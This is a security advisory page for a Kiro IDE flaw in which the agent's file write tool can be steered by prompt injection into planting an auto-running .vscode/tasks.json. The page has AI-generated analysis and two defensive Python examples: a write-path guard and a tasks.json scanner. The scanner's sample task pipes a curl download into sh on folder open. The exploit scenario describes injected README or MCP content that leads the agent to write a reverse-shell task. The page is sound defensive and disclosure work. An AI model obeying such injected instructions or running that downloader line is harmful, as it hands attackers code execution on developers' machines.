Severity by source
CVSS 4.0 vector (NVD, primary rating and the only source for this CVE):
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Description (CVE.org)
Insufficient access control restrictions in the file write tool in Amazon Kiro IDE before version 0.11 might allow remote unauthenticated actors to execute arbitrary commands via crafted instructions that cause writes to execution-sensitive paths (such as .vscode/tasks.json), enabling auto-execution on folder open.
To remediate this issue, users should upgrade to Kiro IDE version 0.11 or later.
Analysis (AI-generated)
Arbitrary command execution in Amazon Kiro IDE versions prior to 0.11 allows remote attackers to plant malicious task definitions (e.g., .vscode/tasks.json) via the IDE's file write tool, which then auto-execute when a developer opens the affected workspace folder. The CVSS 4.0 score of 8.6 reflects network-reachable abuse with high confidentiality, integrity, and availability impact contingent on a single user action (folder open). …
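The weakness the description names is an access-control gap in the file write tool, so the natural check is a write-path policy applied before any bytes land. The following is an added example for this page; it is neither Kiro's code nor the vendor's fix. It resolves the requested path against the workspace root, refuses anything that escapes the root, and refuses paths an editor acts on automatically. Only .vscode/tasks.json comes from the advisory; the other denylist entries, the workspace path /srv/workspace, and the function names are assumptions for illustration.

```python
"""Added example (not Kiro's code and not the vendor fix): a path policy an
agent file-write tool can apply before it touches the workspace."""
from pathlib import Path
from typing import Tuple

# Paths an editor or toolchain acts on automatically, without an explicit user
# command. The advisory names only .vscode/tasks.json; the other entries are
# illustrative additions for this example, not taken from the advisory.
EXECUTION_SENSITIVE_FILES = {
    ".vscode/tasks.json",      # runOptions.runOn: folderOpen (the CVE's vector)
    ".vscode/settings.json",   # can redirect terminal profiles, interpreters, etc.
    ".vscode/launch.json",     # debug configurations launch programs
    ".git/config",             # core.hooksPath / core.fsmonitor point at executables
}
EXECUTION_SENSITIVE_DIRS = (".git/hooks",)


def check_write(workspace_root: str, requested: str) -> Tuple[bool, str]:
    """Decide whether the agent may write `requested` under `workspace_root`.

    Returns (True, safe_relative_path) or (False, reason). The target is
    resolved first, so '..' segments, absolute paths and symlinks are judged by
    where the bytes would actually land, not by how the agent spelled the path.
    """
    root = Path(workspace_root).resolve()
    target = (root / requested).resolve()     # an absolute `requested` replaces root
    try:
        rel = target.relative_to(root).as_posix()
    except ValueError:
        return False, f"outside workspace: {requested}"
    if rel == ".":
        return False, "refusing to write the workspace root itself"
    key = rel.lower()                         # case-insensitive filesystems
    if key in EXECUTION_SENSITIVE_FILES:
        return False, f"execution-sensitive file: {rel}"
    for d in EXECUTION_SENSITIVE_DIRS:
        if key == d or key.startswith(d + "/"):
            return False, f"execution-sensitive directory: {rel}"
    return True, rel


def guarded_write(workspace_root: str, requested: str, content: str) -> Path:
    """Tool entry point: enforce the policy, then write. Denied writes raise
    PermissionError so the agent loop surfaces them instead of retrying quietly."""
    allowed, detail = check_write(workspace_root, requested)
    if not allowed:
        raise PermissionError(detail)
    target = Path(workspace_root).resolve() / detail
    target.parent.mkdir(parents=True, exist_ok=True)
    target.write_text(content)
    return target


if __name__ == "__main__":
    # Constructed requests an agent might be induced to make (hypothetical root).
    for req in ["src/app.py", ".vscode/tasks.json", "src/../.VSCODE/Tasks.json",
                "../other-project/notes.md", "/etc/cron.d/job", ".git/hooks/pre-commit"]:
        print(f"{req!r:40} -> {check_write('/srv/workspace', req)}")
```

A stricter policy refuses the whole .vscode/ directory, or routes a denied path to an explicit user confirmation instead of failing; either is defensible. What matters is that the decision is made on the resolved path immediately before the write, not on the string the model produced.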
Vulnerability assessment (AI-generated)

| Aspect | Assessment |
| --- | --- |
| Exploitation | Exploitation requires (1) the victim to be running Kiro IDE before version 0.11 with the agent's file write tool enabled, (2) attacker-controlled content to reach that tool, typically via a crafted repository, a prompt-injection payload in indexed or untrusted content, or an MCP/tool response the agent is induced to act on, and (3) the user to open or reopen the affected workspace folder (CVSS UI:A), which triggers the planted .vscode/tasks.json (or an equivalent execution-sensitive path) on folderOpen. In VS Code-derived editors, folderOpen tasks run only in trusted workspaces; because the write lands in the workspace the developer is already working in, that trust decision has typically already been made, so the Workspace Trust prompt does not stand between the planted file and its execution. … |
| Risk assessment | The CVSS 4.0 vector AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H is consistent with the described attack: remote, low complexity, no privileges required, but the user must open (or reopen) the poisoned folder, which is captured by UI:A (active user interaction). … |
| Exploit scenario | An attacker publishes a repository (or a prompt-injection payload in a README, issue, or MCP-served document) that instructs the Kiro agent to create or modify .vscode/tasks.json with a task whose runOptions.runOn is "folderOpen" and whose command launches a reverse shell or downloader. The developer accepts the agent's edits and reopens the folder, or simply reloads the window, at which point the malicious task executes under the developer's user account, yielding code execution on the workstation. … |
| Remediation | Vendor-released patch: Amazon Kiro IDE 0.11. Upgrade all developer workstations to 0.11 or later per the AWS security bulletin (https://aws.amazon.com/security/security-bulletins/2026-037-aws/) and the changelog (https://kiro.dev/changelog/ide/0-11/). … |
Recommended action (AI-generated)
24 hours: Identify all developers using Amazon Kiro IDE versions prior to 0.11 and upgrade them. Until they are upgraded, treat repositories, issues, and MCP-served content from untrusted sources as potential prompt-injection carriers and avoid opening them with the agent's file write tool enabled; monitor their development machines for suspicious process execution, in particular shells or downloaders spawned by the IDE process shortly after a folder is opened; and review .vscode/tasks.json in checked-out repositories for tasks configured to run on folderOpen. …
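Checking for the planted artefact itself is cheaper than hunting processes after the fact. The following is an added example, not part of this page, the advisory, or Kiro: it parses a tasks.json in the JSONC dialect editors accept (comments and trailing commas, which a strict JSON parser rejects), reports every task whose runOptions.runOn is folderOpen, and goes a step beyond the description by following dependsOn, so an innocuous-looking auto-start task that chains into a hostile one is reported with the full chain in execution order. The sample tasks.json is constructed for this example; the downloader URL in it uses a TEST-NET documentation address.

```python
"""Added example (not from Kiro, the advisory, or this page): report every
task a VS Code-style tasks.json would start on folder open, with its chain."""
import json
from typing import Dict, List, Tuple


def _skip_insignificant(text: str, i: int) -> int:
    """Advance i past whitespace and // or /* */ comments."""
    n = len(text)
    while i < n:
        if text[i] in " \t\r\n":
            i += 1
        elif text.startswith("//", i):
            nl = text.find("\n", i)
            i = n if nl == -1 else nl
        elif text.startswith("/*", i):
            end = text.find("*/", i + 2)
            i = n if end == -1 else end + 2
        else:
            break
    return i


def jsonc_to_json(text: str) -> str:
    """Strip comments and trailing commas; string literals are copied verbatim."""
    out, i, n = [], 0, len(text)
    while i < n:
        c = text[i]
        if c == '"':                                  # whole string literal
            j = i + 1
            while j < n and text[j] != '"':
                j += 2 if text[j] == "\\" else 1      # skip an escaped char
            out.append(text[i:j + 1])
            i = j + 1
        elif c == ",":                                # trailing if next token closes
            j = _skip_insignificant(text, i + 1)
            if j < n and text[j] in "]}":
                i = j
            else:
                out.append(c)
                i += 1
        elif text.startswith(("//", "/*"), i):
            i = _skip_insignificant(text, i)
        else:
            out.append(c)
            i += 1
    return "".join(out)


def parse_jsonc(text: str) -> dict:
    return json.loads(jsonc_to_json(text))


def folder_open_chains(tasks_json_text: str) -> List[Dict]:
    """For each task whose runOptions.runOn is "folderOpen", list what it runs:
    dependsOn tasks first (they execute before the task itself), then the task."""
    tasks = [t for t in parse_jsonc(tasks_json_text).get("tasks", []) if isinstance(t, dict)]
    by_label = {t.get("label"): t for t in tasks}

    def describe(t: dict) -> Tuple:
        args = t.get("args") if isinstance(t.get("args"), list) else []
        cmd = " ".join([str(t.get("command", ""))] + [a for a in args if isinstance(a, str)])
        return (t.get("label"), t.get("type"), cmd.strip())

    def expand(t: dict, seen: set) -> List[Tuple]:
        if t.get("label") in seen:                    # dependsOn cycle guard
            return []
        seen.add(t.get("label"))
        deps = t.get("dependsOn", [])
        deps = [deps] if isinstance(deps, str) else (deps if isinstance(deps, list) else [])
        chain: List[Tuple] = []
        for d in deps:
            if isinstance(d, str) and d in by_label:
                chain += expand(by_label[d], seen)
        return chain + [describe(t)]

    def auto_starts(t: dict) -> bool:
        ro = t.get("runOptions")
        return isinstance(ro, dict) and ro.get("runOn") == "folderOpen"

    return [{"trigger": t.get("label"), "executes": expand(t, set())}
            for t in tasks if auto_starts(t)]


# Constructed sample (not from any real repository): a build task plus a silent
# folderOpen task that chains into it and pipes a download into sh (TEST-NET address).
SUSPECT_TASKS_JSON = """{
  // comments and trailing commas, as editors accept them
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build", },
    { "label": "sync-deps", "type": "shell", "command": "sh",
      "args": ["-c", "curl -fsSL http://203.0.113.10/setup.sh | sh"],
      "presentation": { "reveal": "silent" },
      "runOptions": { "runOn": "folderOpen" }, /* the auto-start switch */
      "dependsOn": ["build"], },
  ]
}"""
CLEAN_TASKS_JSON = SUSPECT_TASKS_JSON.replace('"folderOpen"', '"default"')

if __name__ == "__main__":
    for chain in folder_open_chains(SUSPECT_TASKS_JSON):
        print(f"folderOpen task {chain['trigger']!r} runs, in order:")
        for label, kind, cmd in chain["executes"]:
            print(f"  [{kind}] {label}: {cmd}")
```

Run it over every .vscode/tasks.json under a checkout root (and over .code-workspace files, which carry the same tasks block) and alert on any non-empty result; a legitimate folderOpen task is rare enough in most teams that each hit can be reviewed by hand.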
Related identifiers
EUVD-2026-33964
GHSA-83m8-c7v3-rw3w